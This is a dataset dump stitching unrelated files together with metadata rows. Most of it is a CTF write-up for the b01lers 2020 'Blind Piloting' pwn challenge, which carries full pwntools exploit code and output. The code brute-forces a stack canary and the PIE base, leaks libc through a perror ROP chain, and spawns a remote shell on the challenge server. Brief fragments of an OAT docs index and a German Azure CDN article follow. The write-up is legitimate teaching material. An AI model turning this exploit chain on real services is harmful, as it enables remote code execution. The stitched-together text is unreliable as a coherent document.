] | 1 | 2021-11-09T13:39:40.000Z | 2021-11-10T19:15:04.000Z | b01lersctf2020/blind-piloting/README.md | datajerk/ctf-write-ups | 1bc4ecc63a59de7d924c7214b1ce467801792da0 | [
"MIT"
] | 31 | 2020-05-27T12:29:50.000Z | 2022-03-31T23:23:32.000Z | # b01lers CTF 2020
## Blind Piloting
> **Blind Piloting 1**
>
> Dave now has permanent eye damage because he was in the game too long. He's trying to get home, but he can't see. Guide him.
>
> **Blind Piloting 2**
>
> Dave is almost home! He still can't see, but at least he's headed in the right direction.
>
> `nc pwn.ctf.b01lers.com 1007`
>
> [3504de16acb8b2e521528882eab3bc53](blind-piloting.tgz)
>
> Author: nsnc
Tags: _pwn_ _stack-canary_ _bof_ _libc_ _got_ _remote-shell_
### Introduction
This writeup is more of a walkthrough. If too verbose, then click [exploit.py](exploit.py)
### Full Disclosure
I solved this _after_ the CTF had ended, about 3 days later.
I have to give huge shoutout to **@novafacing** (b01lers CTF 2020 Game Master) for keeping this challenge up and twice restarting it for me late at night (within seconds of asking). Otherwise, I would have just chalked this up as another miss and waited for the next CTF.
### Analysis
#### Checksec
```
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
```
All mitigations in place.
#### Decompile with Ghidra
`blindpiloting` has three functions of interest: `main`, `getInput`, and `win`:



`main` just forks and then calls `getInput` (this is important).
`getInput` reads one char character at a time into `acStack24` until either a `\n` is read or 64 characters has been read into a buffer allocated for 8 characters. Clearly this is a vulnerability, however a stack canary prevents overflowing into `local_10`, e.g. 9 A's:
```
# ./blindpiloting
> AAAAAAAAA
*** stack smashing detected ***: <unknown> terminated
```
### Exploit Part 1
#### Attack Plan
1. Brute-force the stack canary.
2. Smash stack and change return pointer to call `win` to obtain `flag1.txt`
#### Bruce-force the stack canary
> This is a great article on the principals of bruce-forcing stack canaries: [https://ctf101.org/binary-exploitation/stack-canaries/](https://ctf101.org/binary-exploitation/stack-canaries/):
>
> _This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv)._
The above text from the aforementioned URL correctly describes this challenge. The _fork-and-accept_ is required so that the canary does not change, this is due to the fork cloning the parent memory, including the stack canary.
Code:
```
#!/usr/bin/env -S python3 -i
from pwn import *
import binascii
import sys
p = process('./blindpiloting')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p = remote('pwn.ctf.b01lers.com',1007)
#libc = ELF('libc.so.6')
p.recvuntil('> ')
buf = 8 * b'A'
canary = p8(0)
x = [i for i in range(256) if i != 10 ]
for i in range(7):
for j in x:
payload = buf + canary + p8(j)
p.sendline(payload)
r = p.recvuntil('terminated',timeout=1)
if not r:
canary += p8(j)
print(binascii.hexlify(canary))
break
p.clean()
if r:
print("FAILED, you prob got a LF (0xa) in canary")
sys.exit(1)
print("HAVE CANARY")
```
The x86_64 LSB canary byte is always 0, so only 7 bytes to bruce-force.
The `x = [i for i in range(256) if i != 10 ]` expression creates an array of all byte values to test (`0x00` - `0xFF`) without `0xA` (`\n`). This is important since `getInput` will terminate with a `\n`. _But what if 0xA is part of the canary?_ Well, you're screwed, start over.
The rest of this snippet just loops though each position checking for `terminated` (frequent and quick, see output above), if not, then `j` must be a valid canary byte.
Example output:
```
root@53ade7d2b4a0:/pwd/datajerk/b01lersctf/blind-piloting# ./exploit.py
[x] Starting local process './blindpiloting'
[+] Starting local process './blindpiloting': pid 35650
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'000e'
b'000e76'
b'000e7605'
b'000e7605f7'
b'000e7605f702'
b'000e7605f7027a'
b'000e7605f7027aed'
HAVE CANARY
```
At this point any 8 characters + `b'000e7605f7027aed'` will pass the canary check and allow the stack to be smashed.
#### Smash stack and change return pointer to call `win`
Typically at this point we'd overwrite the saved base pointer and then the return address, however because of ASLR (_PIE enabled_--see above) we do not know what address to write. However, we do not need to overwrite the entire address, just the lower bits.
To illustrate this add the following code and the end of the code above and rerun:
```
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
This code will startup the Python REPL preserving our current state:

After brute-forcing the canary, we're prompted to type `gef blindpiloting 35650`.
> `gef`, like `peda` and `pwndbg` are GDB enhancements that make exploit development a bit easier. In this example I just happen to be using `gef`.
The next argument is the binary, and the last the PID.
> In the left-hand pane I typed the aforementioned, and then typed `context` followed by `disas win`, then `vmmap`.
The first line from `vmmap` reports the base address of the binary. In this case `0x000056401f907000`.
You can also correlate this with the saved base pointer (see stack):
```
0x00007ffdad48ead0│+0x0018: 0x000056401f907ab0 → <__libc_csu_init+0> push r15 ← $rbp
```
and the first line of `win`:
```
0x000056401f9079ec <+0>: push rbp
```
All three start with `0x000056401f907`.
Basically, we just need to overwrite `0x9ec` into the return address lower 12 bits to execute `win`, however we cannot send 1/2 bytes (nibbles), so we'll need to send `0x79ec` (the `7` is the last nibble of `0x000056401f907`). Because x86_64 is little endian bytes are written from right-to-left, _from this point of view_, IOW send `0xec` then `0x79`.
In the left pane the program is currently stopped, but before we _continue_ we need to `set follow-fork-mode child` so that when `main` forks we follow the child process. After that type `c` to start up the binary.
On the right pane type: `p.sendline()`:

Ok, now we're talking.
Send exploit from right pane:
```
p.sendline(buf + canary + 8*b'B' + p16(0x79ec))
```
This is the same as what the brute-force loop determined as the canary + 8 bytes to overwrite the saved base pointer and then the last 16-bits of the return address with the last 16-bit of the `win` address.

SIGSEGV. No flag.
The exploit worked and it _did_ call `win` as shown by the backtrace:
```
[#0] 0x7fae7bb4b13d → do_system(line=0x56401f907b37 "cat flag1.txt")
[#1] 0x56401f9079fc → win()
[#2] 0x7ffdad48ebb0 → add DWORD PTR [rax], eax
```
But why the SIGSEGV from `libc`?:
```
0x7fae7bb4b12d <do_system+349> mov QWORD PTR [rsp+0x68], 0x0
0x7fae7bb4b136 <do_system+358> mov r9, QWORD PTR [rax]
0x7fae7bb4b139 <do_system+361> punpcklqdq xmm0, xmm1
→ 0x7fae7bb4b13d <do_system+365> movaps XMMWORD PTR [rsp+0x50], xmm0
0x7fae7bb4b142 <do_system+370> call 0x7fae7bc05a00 <__GI___posix_spawn>
0x7fae7bb4b147 <do_system+375> mov rdi, r12
0x7fae7bb4b14a <do_system+378> mov DWORD PTR [rsp+0x8], eax
0x7fae7bb4b14e <do_system+382> call 0x7fae7bc05900 <__posix_spawnattr_destroy>
0x7fae7bb4b153 <do_system+387> mov eax, DWORD PTR [rsp+0x8]
```
The first hit from Googling `"movaps XMMWORD PTR [rsp+0x50], xmm0"` (see little `→` above) returned: [https://blog.binpang.me/2019/07/12/stack-alignment/](https://blog.binpang.me/2019/07/12/stack-alignment/) (pause and read this).
There are two ways to solve this:
1. Write a return ROP gadget on the stack after the base pointer but before the `win` address. The problem with that is that we'd need to know the entire base process address (we need to figure this out anyway for the 2nd flag).
2. Jump _into_ `win` avoiding the `push rbp` that is misaligning the stack.
```
Dump of assembler code for function win:
0x000056401f9079ec <+0>: push rbp
0x000056401f9079ed <+1>: mov rbp,rsp
0x000056401f9079f0 <+4>: lea rdi,[rip+0x140] # 0x56401f907b37
0x000056401f9079f7 <+11>: call 0x56401f9077e0 <system@plt>
0x000056401f9079fc <+16>: nop
0x000056401f9079fd <+17>: pop rbp
0x000056401f9079fe <+18>: ret
```
Option 2 for this part of the challenge is the simpler solution, instead of using `0x79ec` we'll use `0x79f0`.
To test this we first need to attach GDB to the parent process with `attach 35650`. This is a parent PID. This can be obtained from the right pane with `p.pid`.
Next we just repeat the previous steps, `c` in the left pane, then `p.sendline()` in the right.
Now the exploit:
```
p.sendline(buf + canary + 8*b'B' + p16(0x79f0))
```

The left pane should have something like this:
```
process 36414 is executing new program: /usr/bin/dash
[Attaching after process 36414 fork to child process 36415]
[New inferior 5 (process 36415)]
[Detaching after fork from parent process 36414]
[Inferior 4 (process 36414) detached]
process 36415 is executing new program: /usr/bin/cat
[Inferior 5 (process 36415) exited normally]
```
Indicating that `/bin/sh` followed by `/usr/bin/cat` was executed.
Exploit achieved.
If you type `print(p.recvline())` in the right pane you should get the output of the `cat` command, IOW, `flag1.txt`:
```
>>> print(p.recvline())
b'> > > pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}\n'
```
There's one last bit to figure out; that leading `7`. The difference between the base process address and `win` is `0x9ec`. The `7` was random (ASLR) and will need to be brute-forced as well when exploiting the remote server (no GDB to help you there):
Replacing:
```
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
with:
```
bp = 8 * b'B'
flag1 = 0x9f0
for i in range(16):
payload = buf + canary + bp + p16(flag1 + i * 0x1000)
print(hex(flag1 + i * 0x1000))
p.sendline(payload)
_ = p.recvuntil('}',timeout=0.25)
if _.find(b'pctf') != -1:
print(_[_.find(b'pctf'):])
break
p.clean()
if _.find(b'pctf') == -1:
print("FAILED, no base for you")
sys.exit(1)
```
should do the trick.
The `payload` should look similar to the handjob above, however we have to test each 4th nibble until the exploit works.
The `p.recvuntil('}',timeout=0.25)` will wait up to `0.25` seconds to detect the flag. When testing with the challenge server it may need to be tuned depending on how overloaded the server is and network congestion. `0.25` worked for me (3 days after the CTF). Longer is fine too, it's only 16 attempts.
> P.S. remember to create a `flag1.txt` file during dev/test.
Output:
```
[x] Starting local process './blindpiloting'
[+] Starting local process './blindpiloting': pid 36426
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'0008'
b'0008d5'
b'0008d531'
b'0008d531e5'
b'0008d531e54a'
b'0008d531e54af3'
b'0008d531e54af367'
HAVE CANARY
0x9f0
0x19f0
0x29f0
0x39f0
0x49f0
0x59f0
0x69f0
0x79f0
0x89f0
0x99f0
0xa9f0
0xb9f0
0xc9f0
0xd9f0
b'pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}'
```
Flag 1: `pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}`
### Exploit Part 2
There isn't a `win2`.
We're going to need to perform a 3rd brute-force to get the entire base process address. This is fairly straightforward using the same techniques above. Once we have this we have options, such as ROP.
#### Analysis
We need to find a way to emit something useful. Once we have the base processor address we can use ROP, however there's really nothing of much use within the binary itself (or at least I could find)--we're going to need to use `libc`.
Let's check the menu.
Type `gef blindpiloting`, then `r` to run, then `ctrl-c` to stop, then finally `got`:
```
gef➤ got
GOT protection: Full RelRO | GOT functions: 9
[0x555555754f90] write@GLIBC_2.2.5 → 0x7ffff7ecf300
[0x555555754f98] __stack_chk_fail@GLIBC_2.4 → 0x7ffff7ef0dd0
[0x555555754fa0] system@GLIBC_2.2.5 → 0x7ffff7e134e0
[0x555555754fa8] read@GLIBC_2.2.5 → 0x7ffff7ecf260
[0x555555754fb0] setvbuf@GLIBC_2.2.5 → 0x7ffff7e45d50
[0x555555754fb8] waitpid@GLIBC_2.2.5 → 0x7ffff7ea3a30
[0x555555754fc0] perror@GLIBC_2.2.5 → 0x7ffff7e234f0
[0x555555754fc8] exit@GLIBC_2.2.5 → 0x7ffff7e07d40
[0x555555754fd0] fork@GLIBC_2.2.5 → 0x7ffff7ea3d90
```
These are the `libc` functions from our GOT that we can call. On the left are the addresses in the process space, and this we can brute-force and leverage. On the right are the `libc` addresses of the function. The Linux dynamic linker/loader populates this table and thanks to ASLR it will be different (both sides of the table) on each run (but not each fork).
From the list, `write`, `system`, and `perror` can all emit characters. `write` is more complex requiring 3 arguments (4 actually--system call number). `system` is perfect, however we have to pass a pointer to a character string with the command we want to run. Unfortuneatly there is no `cat flag2.txt` or `/bin/sh` in `blindpiloting` we can use. That leaves `perror`.
`perror` in this context is not unlike `puts`. `perror`, like `system`, needs a pointer to a string--a "string" being an array of bytes terminated with a NULL), and will emit that string along with some other text (that we have little use for except to detect we successfully called `perror`).
The GOT is table of pointers, we just need to pick one to leak. `write` is out--it has a NULL byte in the address (`0x7ffff7ecf300`)--`perror` will not emit the entire address. The rest are all fine candidates. Out of laziness I just used `perror`'s address (yyp, edit--you'll see in the code).
When `perror` is invoked it expects RDI to be loaded with an address to a constant string, so we first have to _pop_ a value into RDI. You can determine this by looking at the Ghidra disassemble:

You can also discovery this with a small C program and GDB by setting a breakpoint before `perror` and looking at the stack, e.g.:
```
#include <stdio.h>
int main()
{
perror("foo");
return 0;
}
```
Compile and load with `gef perror_test`, disassemble, set breakpoint, then run:
```
# gcc -o perror_test perror_test.c
# gef perror_test
gef➤ disas main
Dump of assembler code for function main:
0x0000000000001149 <+0>: endbr64
0x000000000000114d <+4>: push rbp
0x000000000000114e <+5>: mov rbp,rsp
0x0000000000001151 <+8>: lea rdi,[rip+0xeac] # 0x2004
0x0000000000001158 <+15>: call 0x1050 <perror@plt>
0x000000000000115d <+20>: mov eax,0x0
0x0000000000001162 <+25>: pop rbp
0x0000000000001163 <+26>: ret
End of assembler dump.
gef➤ b *main+15
Breakpoint 1 at 0x1158
gef➤ r
Starting program: /pwd/datajerk/b01lersctf/blind-piloting/perror_test
```
After the break, look at the registers, notice a pointer to `foo` in `$rdi`:
```
$rax : 0x0000555555555149 → <main+0> endbr64
$rbx : 0x0
$rcx : 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rdx : 0x00007fffffffe658 → 0x00007fffffffe874 → "LESSOPEN=| /usr/bin/lesspipe %s"
$rsp : 0x00007fffffffe560 → 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rbp : 0x00007fffffffe560 → 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rsi : 0x00007fffffffe648 → 0x00007fffffffe840 → "/pwd/datajerk/b01lersctf/blind-piloting/perror_tes[...]"
$rdi : 0x0000555555556004 → 0x3b031b01006f6f66 ("foo"?)
$rip : 0x0000555555555158 → <main+15> call 0x555555555050 <perror@plt>
$r8 : 0x0
$r9 : 0x00007ffff7fe11f0 → endbr64
$r10 : 0x0
$r11 : 0x0
$r12 : 0x0000555555555060 → <_start+0> endbr64
$r13 : 0x00007fffffffe640 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
```
Or you can just RTFM (Linux Kernel docs):
```
RAX -> system call number
RDI -> first argument
RSI -> second argument
RDX -> third argument
R10 -> fourth argument
R8 -> fifth argument
R9 -> sixth argument
```
Since `perror` has one argument, RDI it is.
After leaking a `libc` address, it's game over.
#### Attack Plan
1. Brute-force base process address using `flag1.txt`
2. Use `perror` to leak `libc` address
3. Use `libc` to to get a shell
4. Get the flag
#### Brute-force base process address using `flag1.txt`
Append to the previous code:
```
p.clean()
procbase = p16(flag1 + i * 0x1000)
for i in range(6):
for j in x:
payload = buf + canary + bp + procbase + p8(j)
p.sendline(payload)
r = p.recvuntil('> ')
r += p.clean(timeout=0.25)
if r.find(b'pctf') != -1:
procbase += p8(j)
print(binascii.hexlify(procbase))
break
if not r.find(b'pctf') != -1:
print("FAILED, you prob got an LF (0xa) in stack")
sys.exit(1)
procbase = int(procbase[::-1].hex(),16) ^ flag1
print(hex(procbase))
print("HAVE PROCBASE")
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
You should be getting use to this pattern by now--looping through all bytes (but `0xa`) and testing for success (in this case `flag1.txt`). This time the payload is 8 A's + canary + 8 B's (for the saved base pointer) + procbase (the first 2 bytes from the previous step + others brute-forced in this 3rd step).
Of the 8 bytes, we only have to bruce-force 6 since we already know the first two from the previous step. Actually, it not strictly necessary to brute-force the last two bytes; x86_64 only uses 48-bit addresses (as of this writing), since this could change in the future, and since brute-forcing `0x00` is quick, I kept the outer loop to find all 6 remaining bytes.
w.r.t. the following two lines:
```
r = p.recvuntil('> ')
r += p.clean(timeout=0.25)
```
This is where I lost a bit of time. The previous code I had developed worked locally but not remotely. When testing over the network I'd either get `> pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}` or `pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3} >` depending on whether or not the new fork sent the new prompt (`> `) before the old fork sent the flag. To fix this I added the 2nd line to wait 0.25 seconds for any other output. Like the previous step this is tunable and may vary depending on the network and challenge server load. Larger values will still work, just slower.
> Tip: use `context.log_level='DEBUG'` when developing your _pwntools_ exploits to find these problems sooner.
Run it:

The right pane is the output of all three bruce-force attacks. We have the canary, the first flag, and the base process address (`0x563df74f1000`). In the left pane GDB (gef) is running with `set follow-fork-mode child` with `context` output.
#### Use `perror` to leak `libc` address
In the left pane type `got`:
```
gef➤ got
GOT protection: Full RelRO | GOT functions: 9
[0x563df76f1f90] write@GLIBC_2.2.5 → 0x7f72abaa7300
[0x563df76f1f98] __stack_chk_fail@GLIBC_2.4 → 0x7f72abac8dd0
[0x563df76f1fa0] system@GLIBC_2.2.5 → 0x7f72ab9eb4e0
[0x563df76f1fa8] read@GLIBC_2.2.5 → 0x7f72abaa7260
[0x563df76f1fb0] setvbuf@GLIBC_2.2.5 → 0x7f72aba1dd50
[0x563df76f1fb8] waitpid@GLIBC_2.2.5 → 0x7f72aba7ba30
[0x563df76f1fc0] perror@GLIBC_2.2.5 → 0x7f72ab9fb4f0
[0x563df76f1fc8] exit@GLIBC_2.2.5 → 0x7f72ab9dfd40
[0x563df76f1fd0] fork@GLIBC_2.2.5 → 0x7f72aba7bd90
```
`perror` is `procbase` + `0x200fc0`. This is our _pointer_ to a _libc_ address (e.g. `0x7f72ab9fb4f0`).
Actually, there is an easier way to find this with _pwntools_, in the right pane, type:
```
binary = ELF('blindpiloting')
perror_got = binary.got['perror']
hex(perror_got)
hex(procbase + perror_got)
```
Output:
```
>>> binary = ELF('blindpiloting')
[*] '/pwd/datajerk/b01lersctf/blind-piloting/blindpiloting'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
>>> perror_got = binary.got['perror']
>>> hex(perror_got)
'0x200fc0'
>>> hex(procbase + perror_got)
'0x563df76f1fc0'
```
That last value (`0x563df76f1fc0 `) should match `perror` in the GOT above (`[0x563df76f1fc0] perror@GLIBC_2.2.5`).
To call `perror` to emit (leak) the `libc` address, we can use the PLT, in the right pane, type:
```
perror_plt = binary.plt['perror']
hex(perror_plt)
hex(procbase + perror_plt)
```
Output:
```
>>> perror_plt = binary.plt['perror']
>>> hex(perror_plt)
'0x820'
>>> hex(procbase + perror_plt)
'0x563df74f1820'
```
`0x563df74f1820 ` is the address to overwrite into the return address (stack).
In the left pane type `disas 0x563df74f1820` to confirm:
```
gef➤ disas 0x563df74f1820
Dump of assembler code for function perror@plt:
0x0000563df74f1820 <+0>: jmp QWORD PTR [rip+0x20079a] # 0x563df76f1fc0 <[email protected]>
0x0000563df74f1826 <+6>: push 0x6
0x0000563df74f182b <+11>: jmp 0x563df74f17b0
End of assembler dump.
```
Setting the return address in the stack to `procbase` + `0x820` (`0x563df74f1820`) will call `perror` and emit whatever RDI points to.
> This would be a good time to read up on GOT, PLT, and ROP.
Lastly we need a way _pop_ a value from the stack into RDI, and to do that we need ROP. In the right pane, type:
```
context.clear(arch='amd64')
rop = ROP('blindpiloting')
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
hex(pop_rdi)
```
Output:
```
>>> context.clear(arch='amd64')
>>> rop = ROP('blindpiloting')
[*] Loaded 14 cached gadgets for 'blindpiloting'
>>> pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
>>> hex(pop_rdi)
'0xb13'
```
That is the location in `blindpiloting` where there is a `pop rdi` instruction followed by a `ret` instruction. To illustrate this:
```
# objdump -M intel -d blindpiloting | grep -A1 b12:
b12: 41 5f pop r15
b14: c3 ret
```
At offset `0xb13` is `0x5f` followed by `0xc3`.
`0x5f` is `pop rdi`, and `0xc3` is `ret`. An easy way to check:
```
# cat >rop.s <<'EOF'
> BITS 64
> pop rdi
> ret
> EOF
# nasm rop.s
# hexdump -C rop
00000000 5f c3 |_.|
00000002
```
Now that we have all the necessary information it is time to test our leak, in the left pane type `c` to continue, and in the right pane type:
```
p.sendline()
```
left pane should look something like this:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7377]
[New inferior 2 (process 7377)]
[Detaching after fork from parent process 6079]
[Inferior 1 (process 6079) detached]
```
In the right pane, create and send payload:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi)
payload += p64(procbase + perror_got)
payload += p64(procbase + perror_plt)
```
This payload will write out the buffer, then overflow the canary and the saved base pointer. The return address on the stack will be replaced with the address to our `pop rdi` gadget. This gadget will _pop_ off the next value on the stack (the address to `perror` in the GOT that is then a pointer to the libc `perror` function) into `rdi`. The second instruction in the gadget will `ret`. That return will then pop off the next value on the stack into `rip` and execute the `perror` function that will then leak a libc address.
```
p.sendline(payload)
```
The left pane should have exited _normally_:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7377]
[New inferior 2 (process 7377)]
[Detaching after fork from parent process 6079]
[Inferior 1 (process 6079) detached]
[Inferior 2 (process 7377) exited normally]
gef➤
```
In the right pane type the following to get and print the output:
```
_ = p.recvline()
_
```
Output:
```
b'> \xf0\xb4\x9f\xabr\x7f: Success\n'
```
Got the address of `perror`! Now lets get libc:
```
perror=(int(_.strip()[:-9][-6:][::-1].hex(),16))
hex(perror)
libcbase = perror - libc.symbols['perror']
hex(libcbase)
```
Output:
```
>>> perror=(int(_.strip()[:-9][-6:][::-1].hex(),16))
>>> hex(perror)
'0x7f72ab9fb4f0'
>>> libcbase = perror - libc.symbols['perror']
>>> hex(libcbase)
'0x7f72ab996000'
```
The address of `perror` (`0x7f72ab9fb4f0`) should match `perror` from the GOT above (`[0x563df76f1fc0] perror@GLIBC_2.2.5 → 0x7f72ab9fb4f0`).
#### Use `libc` to to get a shell

All that is left is to use libc to get a shell. In the left pane we'll have to attach to the parent using `p.pid` (from the right pane), then `c` to continue.
Same as before, but this time we point to `/bin/sh` in libc and call system:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi)
payload += p64(libcbase + next(libc.search(b"/bin/sh")))
payload += p64(libcbase + libc.symbols['system'])
```
This payload is just like before, use `pop rdi; ret` gadget to pop off the address that points to `/bin/sh` in libc, then call libc `system` to execute the shell:
```
p.sendline()
p.sendline(payload)
```

SEGSEVG again. Does `movaps XMMWORD PTR [rsp+0x50], xmm0` look familiar?
Stack misalignment.
If you still do not understand why, read this again: [https://blog.binpang.me/2019/07/12/stack-alignment/](https://blog.binpang.me/2019/07/12/stack-alignment/)
The fix is easy, just ROP a `ret` first, then the rest of the payload. This trick could not be used with `win` above because we did not know the entire base process address.
Use `p.pid` in the right pane to find the PID and attach in the left pane.
As before `c` to continue, and `p.sendline()`, now the payload:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi + 1)
payload += p64(procbase + pop_rdi)
payload += p64(libcbase + next(libc.search(b"/bin/sh")))
payload += p64(libcbase + libc.symbols['system'])
```
This payload will just return, then `pop rdi; ret`.
> `procbase + pop_rdi + 1` is just the `ret` part of the gadget, we could have also used `procbase + rop.find_gadget(['ret'])[0]`, but since we already know our gadget ends in `ret` we can just used that too.
With `rdi` pointing to the string `/bin/sh` that last part of the payload just calls `system`. Last attempt:
```
p.sendline(payload)
```
The left pane should report a shell is running:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7383]
[New inferior 5 (process 7383)]
[Detaching after fork from parent process 6079]
[Inferior 4 (process 6079) detached]
[Attaching after process 7383 vfork to child process 7384]
[New inferior 6 (process 7384)]
[Detaching vfork parent process 7383 after child exec]
[Inferior 5 (process 7383) detached]
process 7384 is executing new program: /usr/bin/dash
[Attaching after process 7384 fork to child process 7385]
[New inferior 7 (process 7385)]
[Detaching after fork from parent process 7384]
[Inferior 6 (process 7384) detached]
process 7385 is executing new program: /usr/bin/dash
```
Got shell.
In the right pane type: `p.interactive()`
```
>>> p.interactive()
[*] Switching to interactive mode
```
#### Get the flag
Type `cat flag2.txt`:
```
pctf{Eh_2_brute_Brut3_BRUT3!}
```
ctrl-d when done.
### Remote output:
Change: `#!/usr/bin/env -S python3 -i` to `#!/usr/bin/env python3` if you like.
```
[+] Opening connection to pwn.ctf.b01lers.com on port 1007: Done
[*] '/pwd/datajerk/b01lersctf/blind-piloting/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'008d'
b'008df2'
b'008df267'
b'008df267d6'
b'008df267d651'
b'008df267d651bd'
b'008df267d651bd38'
HAVE CANARY
0x9f0
0x19f0
0x29f0
0x39f0
0x49f0
b'pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}'
b'f04948'
b'f0494894'
b'f049489414'
b'f04948941456'
b'f0494894145600'
b'f049489414560000'
0x561494484000
HAVE PROCBASE
[*] '/pwd/datajerk/b01lersctf/blind-piloting/blindpiloting'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for 'blindpiloting'
0x7f406a3a6270
0x7f406a32b000
HAVE LIBCBASE
[*] Switching to interactive mode
> $ cat flag2.txt
pctf{Eh_2_brute_Brut3_BRUT3!}
```
| 31.587336 | 560 | 0.7045 | eng_Latn | 0.966985 |
e03e31bce0d1b714259872d14af046e60d7eba72 | 86 | md | Markdown | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 64 | 2020-07-19T04:21:24.000Z | 2022-02-22T00:26:48.000Z | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 43 | 2020-07-19T17:12:07.000Z | 2022-03-09T20:43:08.000Z | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 13 | 2020-07-21T19:29:51.000Z | 2022-01-24T10:01:53.000Z | # Explore
You can explore the OAT documentation using the navigation bar to the left. | 28.666667 | 75 | 0.802326 | eng_Latn | 0.999263 |
e03e321e4d272c1a32c1e57c147401b0425749d1 | 18,277 | md | Markdown | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Schützen von Azure CDN-Assets mit Tokenauthentifizierung | Microsoft-Dokumentation
description: Hier erfahren Sie, wie Sie die Tokenauthentifizierung zum Schützen des Zugriffs auf Ihre Azure CDN-Assets verwenden.
services: cdn
documentationcenter: .net
author: zhangmanling
manager: zhangmanling
editor: ''
ms.assetid: 837018e3-03e6-4f9c-a23e-4b63d5707a64
ms.service: azure-cdn
ms.devlang: multiple
ms.topic: how-to
ms.tgt_pltfrm: na
ms.workload: integration
ms.date: 11/17/2017
ms.author: mazha
ms.openlocfilehash: bded48b59d10e47a9bbf476583fed78b5b97431d
ms.sourcegitcommit: 877491bd46921c11dd478bd25fc718ceee2dcc08
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 07/02/2020
ms.locfileid: "84887431"
---
# <a name="securing-azure-cdn-assets-with-token-authentication"></a>Schützen von Azure CDN-Assets mit Tokenauthentifizierung
[!INCLUDE [cdn-premium-feature](../../includes/cdn-premium-feature.md)]
## <a name="overview"></a>Übersicht
Die Tokenauthentifizierung ist ein Mechanismus, mit dem Sie verhindern können, dass Assets im Azure Content Delivery Network (CDN) für nicht autorisierte Clients bereitgestellt werden. Die Tokenauthentifizierung wird normalerweise genutzt, um das *Hotlinking* von Inhalten zu verhindern. Dabei verwendet eine andere Website (z.B. ein Diskussionsforum) Ihre Assets ohne Erlaubnis. Hotlinking kann sich auf Ihre Kosten für die Inhaltsbereitstellung auswirken. Durch Aktivieren der Tokenauthentifizierung im CDN werden Anforderungen von CDN-Edgeserver authentifiziert, bevor das CDN den Inhalt übermittelt.
## <a name="how-it-works"></a>Funktionsweise
Bei der Tokenauthentifizierung wird überprüft, ob Anforderungen von einer vertrauenswürdigen Website generiert werden. Dazu müssen die Anforderungen einen Tokenwert mit codierten Informationen zur anfordernden Person enthalten. Inhalte werden der anfordernden Person nur bereitgestellt, wenn die codierten Informationen die erforderlichen Voraussetzungen erfüllen. Andernfalls werden die Anforderungen abgelehnt. Sie können die Anforderungen einrichten, indem Sie einen oder mehrere der folgenden Parameter verwenden:
- Land/Region: Lassen Sie Anforderungen zu, die aus den Ländern/Regionen stammen, die durch den [Länder-/Regionscode](/previous-versions/azure/mt761717(v=azure.100)) angegeben sind, oder verweigern Sie solche Anforderungen.
- URL: Lassen Sie nur Anforderungen zu, die der angegebenen Ressource oder dem Pfad entsprechen.
- Host: Lassen Sie Anforderungen zu, die die im Anforderungsheader angegebenen Hosts verwenden, oder verweigern Sie solche Anforderungen.
- Verweiser: Lassen Sie Anforderungen vom angegebenen Verweiser zu, oder verweigern Sie solche Anforderungen.
- IP-Adresse: Lassen Sie nur Anforderungen zu, die von einer bestimmten IP-Adresse oder aus einem bestimmten IP-Subnetz stammen.
